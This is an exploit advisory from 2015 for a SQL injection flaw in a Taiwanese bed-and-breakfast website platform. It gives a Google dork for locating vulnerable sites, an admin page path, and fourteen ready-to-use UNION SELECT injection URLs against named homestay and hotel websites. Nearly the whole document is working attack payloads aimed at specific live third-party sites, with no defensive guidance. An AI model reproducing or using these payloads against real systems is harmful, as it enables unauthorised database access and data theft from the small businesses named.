######################
# Exploit Title : 花蓮民宿王 │ 洄瀾網 SQL injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.17357.com.tw/
# Google Dork : intext:"花蓮民宿王 │ 洄瀾網" inurl:index.php?news_id=
# Date: 26 Dec 2015
# Tested On : Win 10 / Google Chrome
#
######################
# adminpage= target/news/Admin.php
#
# demos :
# http://www.chenfa8533996.com.tw/new/index.php?news_id=-38+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.gmu.com.tw/news/index.php?news_id=-83+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.hl-sunshine.com.tw/news/index.php?news_id=-79+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.shanjun.com.tw/new/index.php?news_id=-68+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.nice-neighbor.com.tw/new/index.php?news_id=-59+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.sky-moon.com.tw/news/index.php?news_id=-58+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.summer-love.com.tw/new/index.php?news_id=-68+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.brightly-home.com.tw/new/index.php?pageNum_RecdigiBoard=0&totalRows_RecdigiBoard=1&news_id=-61+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.blueocean-c.com.tw/news/index.php?news_id=-58+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.jimeihomestay.com/new/index.php?news_id=-65+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.hl-garden.com.tw/news.php?news_id=-16+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.hl-white.com.tw/news/index.php?news_id=-66+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.gr-sea.com.tw/news/index.php?news_id=-67+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
# http://www.hotelbayview.com.tw/tours/index.php?news_id=-15+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13
######################
# discovered by : modiret
######################